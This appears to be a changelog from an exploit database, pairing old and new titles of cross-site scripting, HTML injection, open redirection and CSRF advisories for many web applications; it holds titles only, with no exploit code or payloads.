DevTracker Module For bcoos 1.1.11 and E-xoops 1.0.8 - Multiple Cross-Site Scripting Vulnerabilities
DevTracker Module For bcoos 1.1.11 and E-xoops 1.0.8 - Cross-Site Scripting Multiple Vulnerabilities

e107 CMS 0.7 - Multiple Cross-Site Scripting Vulnerabilities
e107 CMS 0.7 - Cross-Site Scripting Multiple Vulnerabilities

Jeebles Directory 2.9.60 - Multiple Cross-Site Scripting Vulnerabilities
Jeebles Directory 2.9.60 - Cross-Site Scripting Multiple Vulnerabilities

IBM Rational ClearQuest 7.0 - Multiple Cross-Site Scripting Vulnerabilities
IBM Rational ClearQuest 7.0 - Cross-Site Scripting Multiple Vulnerabilities

DivXDB 2002 0.94b - Multiple Cross-Site Scripting Vulnerabilities
DivXDB 2002 0.94b - Cross-Site Scripting Multiple Vulnerabilities

QT-cute QuickTalk Guestbook 1.6 - Multiple Cross-Site Scripting Vulnerabilities
QT-cute QuickTalk Guestbook 1.6 - Cross-Site Scripting Multiple Vulnerabilities

osCommerce 2.1/2.2 - Multiple Cross-Site Scripting Vulnerabilities
osCommerce 2.1/2.2 - Cross-Site Scripting Multiple Vulnerabilities

Tux CMS 0.1 - Multiple Cross-Site Scripting Vulnerabilities
Tux CMS 0.1 - Cross-Site Scripting Multiple Vulnerabilities

Horde Turba 3.1.7 - Multiple Cross-Site Scripting Vulnerabilities
Horde Turba 3.1.7 - Cross-Site Scripting Multiple Vulnerabilities

SchoolCenter 7.5 - Multiple Cross-Site Scripting Vulnerabilities
SchoolCenter 7.5 - Cross-Site Scripting Multiple Vulnerabilities

Hot Links SQL-PHP - Multiple Cross-Site Scripting Vulnerabilities
Hot Links SQL-PHP - Cross-Site Scripting Multiple Vulnerabilities

SimpleNotes - Multiple Cross-Site Scripting Vulnerabilities
SimpleNotes - Cross-Site Scripting Multiple Vulnerabilities

PEGames - Multiple Cross-Site Scripting Vulnerabilities
PEGames - Cross-Site Scripting Multiple Vulnerabilities

Pluck CMS 4.5.2 - Multiple Cross-Site Scripting Vulnerabilities
Pluck CMS 4.5.2 - Cross-Site Scripting Multiple Vulnerabilities

Quate CMS 0.3.4 - Multiple Cross-Site Scripting Vulnerabilities
Quate CMS 0.3.4 - Cross-Site Scripting Multiple Vulnerabilities

Ubee EVW3200 - Multiple Persistent Cross-Site Scripting Vulnerabilities
Ubee EVW3200 - Persistent Cross-Site Scripting Multiple Vulnerabilities
TimeTrex Time 2.2 and Attendance Module - Multiple Cross-Site Scripting Vulnerabilities
Accellion File Transfer - Multiple Cross-Site Scripting Vulnerabilities
TimeTrex Time 2.2 and Attendance Module - Cross-Site Scripting Multiple Vulnerabilities
Accellion File Transfer - Cross-Site Scripting Multiple Vulnerabilities

vTiger CRM 5.0.4 - Multiple Cross-Site Scripting Vulnerabilities
vTiger CRM 5.0.4 - Cross-Site Scripting Multiple Vulnerabilities

@Mail 5.42 and @Mail WebMail 5.0.5 - Multiple Cross-Site Scripting Vulnerabilities
@Mail 5.42 and @Mail WebMail 5.0.5 - Cross-Site Scripting Multiple Vulnerabilities

Silentum LoginSys 1.0 - Multiple Cross-Site Scripting Vulnerabilities
Silentum LoginSys 1.0 - Cross-Site Scripting Multiple Vulnerabilities

Gallery 2.0 - Multiple Cross-Site Scripting Vulnerabilities
Gallery 2.0 - Cross-Site Scripting Multiple Vulnerabilities

Paranews 3.4 - Multiple Cross-Site Scripting Vulnerabilities
Paranews 3.4 - Cross-Site Scripting Multiple Vulnerabilities

Flatpress 0.804 - Multiple Cross-Site Scripting Vulnerabilities
Flatpress 0.804 - Cross-Site Scripting Multiple Vulnerabilities

Membership Script - Multiple Cross-Site Scripting Vulnerabilities
Membership Script - Cross-Site Scripting Multiple Vulnerabilities

Celoxis - Multiple Cross-Site Scripting Vulnerabilities
Celoxis - Cross-Site Scripting Multiple Vulnerabilities

WikyBlog 1.7.1 - Multiple Cross-Site Scripting Vulnerabilities
WikyBlog 1.7.1 - Cross-Site Scripting Multiple Vulnerabilities

UC Gateway Investment SiteEngine 5.0 - 'api.php' URI redirection
UC Gateway Investment SiteEngine 5.0 - 'api.php' Open Redirection

KKE Info Media Kmita Gallery - Multiple Cross-Site Scripting Vulnerabilities
KKE Info Media Kmita Gallery - Cross-Site Scripting Multiple Vulnerabilities

Venalsur Booking Centre 2.01 - Multiple Cross-Site Scripting Vulnerabilities
Venalsur Booking Centre 2.01 - Cross-Site Scripting Multiple Vulnerabilities

CMS Made Simple 1.11.10 - Multiple Cross-Site Scripting Vulnerabilities
CMS Made Simple 1.11.10 - Cross-Site Scripting Multiple Vulnerabilities

Autonomy Ultraseek - 'cs.html' URI redirection
Autonomy Ultraseek - 'cs.html' Open Redirection

E-PHP B2B Trading Marketplace Script - Multiple Cross-Site Scripting Vulnerabilities
E-PHP B2B Trading Marketplace Script - Cross-Site Scripting Multiple Vulnerabilities

Yektaweb Academic Web Tools CMS 1.4.2.8/1.5.7 - Multiple Cross-Site Scripting Vulnerabilities
Yektaweb Academic Web Tools CMS 1.4.2.8/1.5.7 - Cross-Site Scripting Multiple Vulnerabilities

Verlihub Control Panel 1.7 - Multiple Cross-Site Scripting Vulnerabilities
Verlihub Control Panel 1.7 - Cross-Site Scripting Multiple Vulnerabilities

Achievo 1.3.4 - Multiple Cross-Site Scripting Vulnerabilities
Achievo 1.3.4 - Cross-Site Scripting Multiple Vulnerabilities

Webmedia Explorer 5.0.9/5.10 - Multiple Cross-Site Scripting Vulnerabilities
Webmedia Explorer 5.0.9/5.10 - Cross-Site Scripting Multiple Vulnerabilities

XZeroScripts XZero Community Classifieds 4.97.8 - Multiple Cross-Site Scripting Vulnerabilities
XZeroScripts XZero Community Classifieds 4.97.8 - Cross-Site Scripting Multiple Vulnerabilities

Joomla! Component com_user - 'view' URI Redirection
Joomla! Component com_user - 'view' Open Redirection

Miniweb 2.0 Site Builder Module - Multiple Cross-Site Scripting Vulnerabilities
Miniweb 2.0 Site Builder Module - Cross-Site Scripting Multiple Vulnerabilities

Censura < 2.1.1 - Multiple Cross-Site Scripting Vulnerabilities
Censura < 2.1.1 - Cross-Site Scripting Multiple Vulnerabilities

McAfee Network Security Manager 5.1.7 - Multiple Cross-Site Scripting Vulnerabilities
McAfee Network Security Manager 5.1.7 - Cross-Site Scripting Multiple Vulnerabilities

OpenFiler 2.99.1 - Multiple Persistent Cross-Site Scripting Vulnerabilities
OpenFiler 2.99.1 - Persistent Cross-Site Scripting Multiple Vulnerabilities

AfterLogic WebMail Pro 4.7.10 - Multiple Cross-Site Scripting Vulnerabilities
AfterLogic WebMail Pro 4.7.10 - Cross-Site Scripting Multiple Vulnerabilities

WordPress Plugin Subscribe to Comments 2.0 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin Subscribe to Comments 2.0 - Cross-Site Scripting Multiple Vulnerabilities

phpMyFAQ < 2.5.4 - Multiple Cross-Site Scripting Vulnerabilities
phpMyFAQ < 2.5.4 - Cross-Site Scripting Multiple Vulnerabilities

Binatone DT 850W Wireless Router - Multiple Cross-Site Request Forgery Vulnerabilities
Binatone DT 850W Wireless Router - Cross-Site Request Forgery Multiple Vulnerabilities

Discuz! 2.0 - Multiple Cross-Site Scripting Vulnerabilities
Discuz! 2.0 - Cross-Site Scripting Multiple Vulnerabilities

@lex Guestbook 5.0 - Multiple Cross-Site Scripting Vulnerabilities
@lex Guestbook 5.0 - Cross-Site Scripting Multiple Vulnerabilities

Mayan-EDms web-based document management OS system - Multiple Persistent Cross-Site Scripting Vulnerabilities
Mayan-EDms web-based document management OS system - Persistent Cross-Site Scripting Multiple Vulnerabilities

Joomla! Component EasyBook 2.0.0rc4 - Multiple HTML Injection Vulnerabilities
Joomla! Component EasyBook 2.0.0rc4 - HTML Injection Multiple Vulnerabilities

KnowGate hipergate 4.0.12 - Multiple Cross-Site Scripting Vulnerabilities
KnowGate hipergate 4.0.12 - Cross-Site Scripting Multiple Vulnerabilities

vBulletin 3.5.4 - Multiple Cross-Site Scripting Vulnerabilities
vBulletin 3.5.4 - Cross-Site Scripting Multiple Vulnerabilities

Portrait Software Portrait Campaign Manager 4.6.1.22 - Multiple Cross-Site Scripting Vulnerabilities
Portrait Software Portrait Campaign Manager 4.6.1.22 - Cross-Site Scripting Multiple Vulnerabilities

vBulletin 4.0.2 - Multiple Cross-Site Scripting Vulnerabilities
vBulletin 4.0.2 - Cross-Site Scripting Multiple Vulnerabilities

Sparta Systems TrackWise EQms - Multiple Cross-Site Scripting Vulnerabilities
Sparta Systems TrackWise EQms - Cross-Site Scripting Multiple Vulnerabilities

PHPWind 6.0 - Multiple Cross-Site Scripting Vulnerabilities
PHPWind 6.0 - Cross-Site Scripting Multiple Vulnerabilities

SpringSource (Multiple Products) - Multiple HTML Injection Vulnerabilities
SpringSource (Multiple Products) - HTML Injection Multiple Vulnerabilities

Chipmunk NewsLetter 2.0 - Multiple Cross-Site Scripting Vulnerabilities
Chipmunk NewsLetter 2.0 - Cross-Site Scripting Multiple Vulnerabilities

Datetopia Match Agency BiZ - Multiple Cross-Site Scripting Vulnerabilities
Datetopia Match Agency BiZ - Cross-Site Scripting Multiple Vulnerabilities

Bilboplanet 2.0 - Multiple Cross-Site Scripting Vulnerabilities
Bilboplanet 2.0 - Cross-Site Scripting Multiple Vulnerabilities

Hitmaaan Gallery 1.3 - Multiple Cross-Site Scripting Vulnerabilities
Hitmaaan Gallery 1.3 - Cross-Site Scripting Multiple Vulnerabilities

Ez Poll Hoster - Multiple Cross-Site Scripting Vulnerabilities
Ez Poll Hoster - Cross-Site Scripting Multiple Vulnerabilities

LiveZilla 3.1.8.3 - Multiple Cross-Site Scripting Vulnerabilities
LiveZilla 3.1.8.3 - Cross-Site Scripting Multiple Vulnerabilities

Worxware DCP-Portal 7.0 - Multiple Cross-Site Scripting Vulnerabilities
Worxware DCP-Portal 7.0 - Cross-Site Scripting Multiple Vulnerabilities

phpFaber CMS 2.0.5 - Multiple Cross-Site Scripting Vulnerabilities
phpFaber CMS 2.0.5 - Cross-Site Scripting Multiple Vulnerabilities

SimpNews 2.47.3 - Multiple Cross-Site Scripting Vulnerabilities
SimpNews 2.47.3 - Cross-Site Scripting Multiple Vulnerabilities

eliteCMS 1.01 - Multiple Cross-Site Scripting Vulnerabilities
eliteCMS 1.01 - Cross-Site Scripting Multiple Vulnerabilities

WordPress Plugin Firestats 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin Firestats 1.6.5 - Cross-Site Scripting Multiple Vulnerabilities

Diem 5.1.2 - Multiple Cross-Site Scripting Vulnerabilities
Diem 5.1.2 - Cross-Site Scripting Multiple Vulnerabilities

Claus Muus Spitfire 1.0.336 - Multiple Cross-Site Scripting Vulnerabilities
Claus Muus Spitfire 1.0.336 - Cross-Site Scripting Multiple Vulnerabilities

SyndeoCMS 2.9 - Multiple HTML Injection Vulnerabilities
SyndeoCMS 2.9 - HTML Injection Multiple Vulnerabilities

Sourcefabric Campsite - Multiple Cross-Site Scripting Vulnerabilities
Sourcefabric Campsite - Cross-Site Scripting Multiple Vulnerabilities

FuseTalk 3.2/4.0 - Multiple Cross-Site Scripting Vulnerabilities
FuseTalk 3.2/4.0 - Cross-Site Scripting Multiple Vulnerabilities

PHP Stock Management System 1.02 - Multiple Persistent Cross-Site Scripting Vulnerabilities
PHP Stock Management System 1.02 - Persistent Cross-Site Scripting Multiple Vulnerabilities
Hulihan Applications Amethyst 0.1.5 - Multiple HTML Injection Vulnerabilities
Muraus Open Blog - Multiple HTML Injection Vulnerabilities
Hulihan Applications Amethyst 0.1.5 - HTML Injection Multiple Vulnerabilities
Muraus Open Blog - HTML Injection Multiple Vulnerabilities

WordPress Plugin WooCommerce Store Exporter 1.7.5 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin WooCommerce Store Exporter 1.7.5 - Cross-Site Scripting Multiple Vulnerabilities

Preation Eden Platform 27.7.2010 - Multiple HTML Injection Vulnerabilities
Preation Eden Platform 27.7.2010 - HTML Injection Multiple Vulnerabilities
Mystic 0.1.4 - Multiple Cross-Site Scripting Vulnerabilities
Onyx - Multiple Cross-Site Scripting Vulnerabilities
Mystic 0.1.4 - Cross-Site Scripting Multiple Vulnerabilities
Onyx - Cross-Site Scripting Multiple Vulnerabilities

Online Work Order Suite Lite Edition - Multiple Cross-Site Scripting Vulnerabilities
Online Work Order Suite Lite Edition - Cross-Site Scripting Multiple Vulnerabilities

Valarsoft WebMatic 3.0.5 - Multiple HTML Injection Vulnerabilities
Valarsoft WebMatic 3.0.5 - HTML Injection Multiple Vulnerabilities

Amiro.CMS 5.8.4.0 - Multiple HTML Injection Vulnerabilities
Amiro.CMS 5.8.4.0 - HTML Injection Multiple Vulnerabilities

StatsCode - Multiple Cross-Site Scripting Vulnerabilities
StatsCode - Cross-Site Scripting Multiple Vulnerabilities

e-Soft24 Jokes Portal Script Seo 1.0 - Multiple Cross-Site Scripting Vulnerabilities
e-Soft24 Jokes Portal Script Seo 1.0 - Cross-Site Scripting Multiple Vulnerabilities

Open Classifieds - Multiple Cross-Site Scripting Vulnerabilities
Open Classifieds - Cross-Site Scripting Multiple Vulnerabilities

OpenText LiveLink 9.7.1 - Multiple Cross-Site Scripting Vulnerabilities
OpenText LiveLink 9.7.1 - Cross-Site Scripting Multiple Vulnerabilities

Micro CMS 1.0 - 'name' HTML Injection
Micro CMS 1.0 - 'name' HTML Injection (1)

eCardMAX - Multiple Cross-Site Scripting Vulnerabilities
eCardMAX - Cross-Site Scripting Multiple Vulnerabilities

Ronny CMS 1.1 r935 - Multiple HTML Injection Vulnerabilities
Ronny CMS 1.1 r935 - HTML Injection Multiple Vulnerabilities

eXV2 CMS - Multiple Cross-Site Scripting Vulnerabilities
eXV2 CMS - Cross-Site Scripting Multiple Vulnerabilities
Wiccle Web Builder 2.0 - Multiple Cross-Site Scripting Vulnerabilities
Micro CMS 1.0 - 'name' HTML Injection
Wiccle Web Builder 2.0 - Cross-Site Scripting Multiple Vulnerabilities
Micro CMS 1.0 - 'name' HTML Injection (2)

Flatnux 2009-03-27 - Multiple Cross-Site Scripting Vulnerabilities
Flatnux 2009-03-27 - Cross-Site Scripting Multiple Vulnerabilities

Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities
Elastix 2.0.2 - Cross-Site Scripting Multiple Vulnerabilities

Croogo 2.0.0 - Multiple Persistent Cross-Site Scripting Vulnerabilities
Croogo 2.0.0 - Persistent Cross-Site Scripting Multiple Vulnerabilities

Change CMS 3.6.8 - Multiple Cross-Site Request Forgery Vulnerabilities
Change CMS 3.6.8 - Cross-Site Request Forgery Multiple Vulnerabilities

OpenWrt 10.03 - Multiple Cross-Site Scripting Vulnerabilities
OpenWrt 10.03 - Cross-Site Scripting Multiple Vulnerabilities

Contenido CMS 4.8.12 - Multiple Cross-Site Scripting Vulnerabilities
Contenido CMS 4.8.12 - Cross-Site Scripting Multiple Vulnerabilities

SolarWinds Orion Network Performance Monitor (NPM) 10.1 - Multiple Cross-Site Scripting Vulnerabilities
SolarWinds Orion Network Performance Monitor (NPM) 10.1 - Cross-Site Scripting Multiple Vulnerabilities

ManageEngine EventLog Analyzer 6.1 - Multiple Cross-Site Scripting Vulnerabilities
ManageEngine EventLog Analyzer 6.1 - Cross-Site Scripting Multiple Vulnerabilities

Joomla! Component com_mailto - Multiple Cross-Site Scripting Vulnerabilities
Joomla! Component com_mailto - Cross-Site Scripting Multiple Vulnerabilities

Mura CMS - Multiple Cross-Site Scripting Vulnerabilities
Mura CMS - Cross-Site Scripting Multiple Vulnerabilities

BlogCFC 5.9.6.001 - Multiple Cross-Site Scripting Vulnerabilities
BlogCFC 5.9.6.001 - Cross-Site Scripting Multiple Vulnerabilities
Radius Manager 3.6 - Multiple Cross-Site Scripting Vulnerabilities
Social Share - Multiple Cross-Site Scripting Vulnerabilities
Radius Manager 3.6 - Cross-Site Scripting Multiple Vulnerabilities
Social Share - Cross-Site Scripting Multiple Vulnerabilities

Habari 0.6.5 - Multiple Cross-Site Scripting Vulnerabilities
Habari 0.6.5 - Cross-Site Scripting Multiple Vulnerabilities

Openfire 3.6.4 - Multiple Cross-Site Scripting Vulnerabilities
Openfire 3.6.4 - Cross-Site Scripting Multiple Vulnerabilities

phpSound Music Sharing Platform 1.0.5 - Multiple Cross-Site Scripting Vulnerabilities
phpSound Music Sharing Platform 1.0.5 - Cross-Site Scripting Multiple Vulnerabilities

vBSEO 3.2.2/3.5.2 - Multiple Cross-Site Scripting Vulnerabilities
vBSEO 3.2.2/3.5.2 - Cross-Site Scripting Multiple Vulnerabilities

ViArt Shop 4.0.5 - Multiple Cross-Site Scripting Vulnerabilities
ViArt Shop 4.0.5 - Cross-Site Scripting Multiple Vulnerabilities
CiviCRM 3.3.3 - Multiple Cross-Site Scripting Vulnerabilities
UMI CMS 2.8.1.2 - Multiple Cross-Site Scripting Vulnerabilities
CiviCRM 3.3.3 - Cross-Site Scripting Multiple Vulnerabilities
UMI CMS 2.8.1.2 - Cross-Site Scripting Multiple Vulnerabilities

Dolphin 7.0.4 - Multiple Cross-Site Scripting Vulnerabilities
Dolphin 7.0.4 - Cross-Site Scripting Multiple Vulnerabilities
MG2 0.5.1 - Multiple Cross-Site Scripting Vulnerabilities
Gollos 2.8 - Multiple Cross-Site Scripting Vulnerabilities
MG2 0.5.1 - Cross-Site Scripting Multiple Vulnerabilities
Gollos 2.8 - Cross-Site Scripting Multiple Vulnerabilities

Photopad 1.2 - Multiple Cross-Site Scripting Vulnerabilities
Photopad 1.2 - Cross-Site Scripting Multiple Vulnerabilities

Support Incident Tracker (SiT!) 3.62 - Multiple Cross-Site Scripting Vulnerabilities
Support Incident Tracker (SiT!) 3.62 - Cross-Site Scripting Multiple Vulnerabilities

Pragyan CMS 3.0 Beta - Multiple Cross-Site Scripting Vulnerabilities
Pragyan CMS 3.0 Beta - Cross-Site Scripting Multiple Vulnerabilities
WordPress Plugin Sodahead Polls 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin Rating-Widget 1.3.1 - Multiple Cross-Site Scripting Vulnerabilities
XOOPS 2.x - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin Sodahead Polls 2.0.2 - Cross-Site Scripting Multiple Vulnerabilities
WordPress Plugin Rating-Widget 1.3.1 - Cross-Site Scripting Multiple Vulnerabilities
XOOPS 2.x - Cross-Site Scripting Multiple Vulnerabilities
MC Content Manager 10.1.1 - Multiple Cross-Site Scripting Vulnerabilities
GrapeCity Data Dynamics Reports 1.6.2084.14 - Multiple Cross-Site Scripting Vulnerabilities
MC Content Manager 10.1.1 - Cross-Site Scripting Multiple Vulnerabilities
GrapeCity Data Dynamics Reports 1.6.2084.14 - Cross-Site Scripting Multiple Vulnerabilities

WordPress Plugin Daily Maui Photo Widget 0.2 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin Daily Maui Photo Widget 0.2 - Cross-Site Scripting Multiple Vulnerabilities

Kusaba X 0.9 - Multiple Cross-Site Scripting Vulnerabilities
Kusaba X 0.9 - Cross-Site Scripting Multiple Vulnerabilities

Humhub 0.10.0-rc.1 - Multiple Persistent Cross-Site Scripting Vulnerabilities
Humhub 0.10.0-rc.1 - Persistent Cross-Site Scripting Multiple Vulnerabilities

Alkacon OpenCMS 7.5.x - Multiple Cross-Site Scripting Vulnerabilities
Alkacon OpenCMS 7.5.x - Cross-Site Scripting Multiple Vulnerabilities

Claroline 1.10 - Multiple HTML Injection Vulnerabilities
Claroline 1.10 - HTML Injection Multiple Vulnerabilities

YaCOMAS 0.3.6 OpenCMS - Multiple Cross-Site Scripting Vulnerabilities
YaCOMAS 0.3.6 OpenCMS - Cross-Site Scripting Multiple Vulnerabilities

webSPELL 4.2.2a - Multiple Cross-Site Scripting Vulnerabilities
webSPELL 4.2.2a - Cross-Site Scripting Multiple Vulnerabilities

YaPiG 0.95 - Multiple Cross-Site Scripting Vulnerabilities
YaPiG 0.95 - Cross-Site Scripting Multiple Vulnerabilities

PHPDug 2.0 - Multiple Cross-Site Scripting Vulnerabilities
PHPDug 2.0 - Cross-Site Scripting Multiple Vulnerabilities

Keyfax Customer Response Management 3.2.2.6 - Multiple Cross-Site Scripting Vulnerabilities
Keyfax Customer Response Management 3.2.2.6 - Cross-Site Scripting Multiple Vulnerabilities

poMMo Aardvark PR16.1 - Multiple Cross-Site Scripting Vulnerabilities
poMMo Aardvark PR16.1 - Cross-Site Scripting Multiple Vulnerabilities

Argyle Social - Multiple Cross-Site Scripting Vulnerabilities
Argyle Social - Cross-Site Scripting Multiple Vulnerabilities

Mitel Audio and Web Conferencing 4.4.3.0 - Multiple Cross-Site Scripting Vulnerabilities
Mitel Audio and Web Conferencing 4.4.3.0 - Cross-Site Scripting Multiple Vulnerabilities

PHP Calendar Basic 2.3 - Multiple Cross-Site Scripting Vulnerabilities
PHP Calendar Basic 2.3 - Cross-Site Scripting Multiple Vulnerabilities

phpScheduleIt 1.2.12 - Multiple Cross-Site Scripting Vulnerabilities
phpScheduleIt 1.2.12 - Cross-Site Scripting Multiple Vulnerabilities

Blog:CMS 4.2 - Multiple Cross-Site Scripting Vulnerabilities
Blog:CMS 4.2 - Cross-Site Scripting Multiple Vulnerabilities

miniblog 1.0 - Multiple Cross-Site Scripting Vulnerabilities
miniblog 1.0 - Cross-Site Scripting Multiple Vulnerabilities

Mambo 4.6.x - Multiple Cross-Site Scripting Vulnerabilities
Mambo 4.6.x - Cross-Site Scripting Multiple Vulnerabilities
Joomla! 1.6.3 - Multiple Cross-Site Scripting Vulnerabilities
Flatpress 0.1010.1 - Multiple Cross-Site Scripting Vulnerabilities
Joomla! 1.6.3 - Cross-Site Scripting Multiple Vulnerabilities
Flatpress 0.1010.1 - Cross-Site Scripting Multiple Vulnerabilities
MBoard 1.3 - 'url' URI Redirection
PHPJunkYard GBook 1.6/1.7 - Multiple Cross-Site Scripting Vulnerabilities
MBoard 1.3 - 'url'  Open Redirection
PHPJunkYard GBook 1.6/1.7 - Cross-Site Scripting Multiple Vulnerabilities

TCExam 11.2.x - Multiple Cross-Site Scripting Vulnerabilities
TCExam 11.2.x - Cross-Site Scripting Multiple Vulnerabilities

WordPress Plugin bSuite 4.0.7 - Multiple HTML Injection Vulnerabilities
WordPress Plugin bSuite 4.0.7 - HTML Injection Multiple Vulnerabilities

Joomla! < 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities
Joomla! < 1.6.5 - Cross-Site Scripting Multiple Vulnerabilities

Cyberoam UTM - Multiple Cross-Site Scripting Vulnerabilities
Cyberoam UTM - Cross-Site Scripting Multiple Vulnerabilities

Online Grades 3.2.5 - Multiple Cross-Site Scripting Vulnerabilities
Online Grades 3.2.5 - Cross-Site Scripting Multiple Vulnerabilities

Sitecore CMS 6.4.1 - 'url' URI Redirection
Sitecore CMS 6.4.1 - 'url'  Open Redirection

Curverider Elgg 1.7.9 - Multiple Cross-Site Scripting Vulnerabilities
Curverider Elgg 1.7.9 - Cross-Site Scripting Multiple Vulnerabilities

HESK 2.2 - Multiple Cross-Site Scripting Vulnerabilities
HESK 2.2 - Cross-Site Scripting Multiple Vulnerabilities

Exponent CMS 2.3.1 - Multiple Cross-Site Scripting Vulnerabilities
Exponent CMS 2.3.1 - Cross-Site Scripting Multiple Vulnerabilities

Softbiz Recipes Portal Script - Multiple Cross-Site Scripting Vulnerabilities
Softbiz Recipes Portal Script - Cross-Site Scripting Multiple Vulnerabilities

OpenEMR 4.0 - Multiple Cross-Site Scripting Vulnerabilities
OpenEMR 4.0 - Cross-Site Scripting Multiple Vulnerabilities

WordPress Plugin eShop 6.2.8 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin eShop 6.2.8 - Cross-Site Scripting Multiple Vulnerabilities

WordPress Plugin WP-Stats-Dashboard 2.6.5.1 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin WP-Stats-Dashboard 2.6.5.1 - Cross-Site Scripting Multiple Vulnerabilities

Open Classifieds 1.7.2 - Multiple Cross-Site Scripting Vulnerabilities
Open Classifieds 1.7.2 - Cross-Site Scripting Multiple Vulnerabilities

IBM Open Admin Tool 2.71 - Multiple Cross-Site Scripting Vulnerabilities
IBM Open Admin Tool 2.71 - Cross-Site Scripting Multiple Vulnerabilities

GuppY CMS 5.0.9 < 5.00.10 - Multiple Cross-Site Request Forgery Vulnerabilities
GuppY CMS 5.0.9 < 5.00.10 - Cross-Site Request Forgery Multiple Vulnerabilities

Papoo CMS Light 4.0 - Multiple Cross-Site Scripting Vulnerabilities
Papoo CMS Light 4.0 - Cross-Site Scripting Multiple Vulnerabilities

Microsoft SharePoint 2007/2010 - 'Source' Multiple URI Open redirection Vulnerabilities
Microsoft SharePoint 2007/2010 - 'Source' Multiple Open Redirections

PunBB 1.3.5 - Multiple Cross-Site Scripting Vulnerabilities
PunBB 1.3.5 - Cross-Site Scripting Multiple Vulnerabilities

Zyncro 3.0.1.20 - Multiple HTML Injection Vulnerabilities
Zyncro 3.0.1.20 - HTML Injection Multiple Vulnerabilities

Adobe ColdFusion 7 - Multiple Cross-Site Scripting Vulnerabilities
Adobe ColdFusion 7 - Cross-Site Scripting Multiple Vulnerabilities
Joomla! < 1.7.0 - Multiple Cross-Site Scripting Vulnerabilities
Bitweaver 2.8.1 - Multiple Cross-Site Scripting Vulnerabilities
Joomla! < 1.7.0 - Cross-Site Scripting Multiple Vulnerabilities
Bitweaver 2.8.1 - Cross-Site Scripting Multiple Vulnerabilities

vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities
vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities (1)

Silverstripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities
Silverstripe CMS 2.4.5 - Cross-Site Scripting Multiple Vulnerabilities

BugFree 2.1.3 - Multiple Cross-Site Scripting Vulnerabilities
BugFree 2.1.3 - Cross-Site Scripting Multiple Vulnerabilities

WordPress Plugin Pretty Link 1.4.56 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin Pretty Link 1.4.56 - Cross-Site Scripting Multiple Vulnerabilities

Tine 2.0 - Multiple Cross-Site Scripting Vulnerabilities
Tine 2.0 - Cross-Site Scripting Multiple Vulnerabilities

InverseFlow 2.4 - Multiple Cross-Site Scripting Vulnerabilities
InverseFlow 2.4 - Cross-Site Scripting Multiple Vulnerabilities

vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities
vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities (2)

eFront 3.6.10 Build 11944 - Multiple Cross-Site Scripting Vulnerabilities
eFront 3.6.10 Build 11944 - Cross-Site Scripting Multiple Vulnerabilities

CmyDocument - Multiple Cross-Site Scripting Vulnerabilities
CmyDocument - Cross-Site Scripting Multiple Vulnerabilities
AShop - Open-redirection / Cross-Site Scripting
Joomla! Component com_alfcontact 1.9.3 - Multiple Cross-Site Scripting Vulnerabilities
AShop - Open Redirection / Cross-Site Scripting
Joomla! Component com_alfcontact 1.9.3 - Cross-Site Scripting Multiple Vulnerabilities

PrestaShop 1.4.4.1 mondialrelay (kit_mondialrelay) - Multiple Cross-Site Scripting Vulnerabilities
PrestaShop 1.4.4.1 mondialrelay (kit_mondialrelay) - Cross-Site Scripting Multiple Vulnerabilities

Zen Cart CMS 1.3.9h - Multiple Cross-Site Scripting Vulnerabilities
Zen Cart CMS 1.3.9h - Cross-Site Scripting Multiple Vulnerabilities

eSyndiCat Pro 2.3.5 - Multiple Cross-Site Scripting Vulnerabilities
eSyndiCat Pro 2.3.5 - Cross-Site Scripting Multiple Vulnerabilities
Fork CMS 3.1.5 - Multiple Cross-Site Scripting Vulnerabilities
Pulse Pro 1.7.2 - Multiple Cross-Site Scripting Vulnerabilities
Fork CMS 3.1.5 - Cross-Site Scripting Multiple Vulnerabilities
Pulse Pro 1.7.2 - Cross-Site Scripting Multiple Vulnerabilities

epesi BIM 1.2 rev 8154 - Multiple Cross-Site Scripting Vulnerabilities
epesi BIM 1.2 rev 8154 - Cross-Site Scripting Multiple Vulnerabilities

Orchard 1.3.9 - 'ReturnUrl' URI Redirection
Orchard 1.3.9 - 'ReturnUrl'  Open Redirection

WordPress Plugin Age Verification 0.4 - 'redirect_to' URI Redirection
WordPress Plugin Age Verification 0.4 - 'redirect_to' Open Redirection

KnowledgeTree 3.x - Multiple Cross-Site Scripting Vulnerabilities
KnowledgeTree 3.x - Cross-Site Scripting Multiple Vulnerabilities
ATutor 2.0.3 - Multiple Cross-Site Scripting Vulnerabilities
Beehive Forum 101 - Multiple Cross-Site Scripting Vulnerabilities
phpVideoPro 0.8.x/0.9.7 - Multiple Cross-Site Scripting Vulnerabilities
ATutor 2.0.3 - Cross-Site Scripting Multiple Vulnerabilities
Beehive Forum 101 - Cross-Site Scripting Multiple Vulnerabilities
phpVideoPro 0.8.x/0.9.7 - Cross-Site Scripting Multiple Vulnerabilities

Acidcat ASP CMS 3.5 - Multiple Cross-Site Scripting Vulnerabilities
Acidcat ASP CMS 3.5 - Cross-Site Scripting Multiple Vulnerabilities

WordPress Plugin Video Gallery 2.8 - Multiple Cross-Site Request Forgery Vulnerabilities
WordPress Plugin Video Gallery 2.8 - Cross-Site Request Forgery Multiple Vulnerabilities

GForge 5.7.1 - Multiple Cross-Site Scripting Vulnerabilities
GForge 5.7.1 - Cross-Site Scripting Multiple Vulnerabilities

LxCenter Kloxo 6.1.10 - Multiple HTML Injection Vulnerabilities
LxCenter Kloxo 6.1.10 - HTML Injection Multiple Vulnerabilities

Tiki Wiki CMS Groupware - 'url' URI Redirection
Tiki Wiki CMS Groupware - 'url'  Open Redirection

